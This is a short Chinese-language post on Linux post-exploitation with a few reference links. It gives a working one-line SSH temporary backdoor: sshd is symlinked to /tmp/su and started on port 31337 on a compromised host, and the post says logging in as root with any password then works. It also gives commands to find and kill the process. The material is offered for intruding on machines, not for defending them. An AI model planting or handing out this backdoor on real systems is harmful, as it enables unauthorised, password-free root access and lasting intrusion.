linux 后渗透测试

学习参考： 

http://weibo.com/1869235073/B9Seswf9R?type=comment 
http://weibo.com/p/1001603723521007220513 
http://www.sohu.com/a/126011736_505860

linux 常用shell反弹方法小结： 
https://edu.aqniu.com/group/3/thread/22

 

1. SSH渗透技巧

1.1 ssh 临时后门

入侵得到SHELL后，对方防火墙没限制，想快速开放一个可以访问的SSH端口肉鸡上执行

 myles@localhost:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337

就会派生一个31337端口，然后连接31337，用root/bin/ftp/mail当用户名，密码随意，就可登陆。效果图：

 

1.2 如何杀死ssh临时后门

临时后门生成后，如果我们需要杀死这个进程，请使用以下语句。

 

myles@localhost# ps -ef |grep 31337 #查询后门进程ID
myles@localhost# kill -9 ssh_pid #使用kill -9 直接杀死进程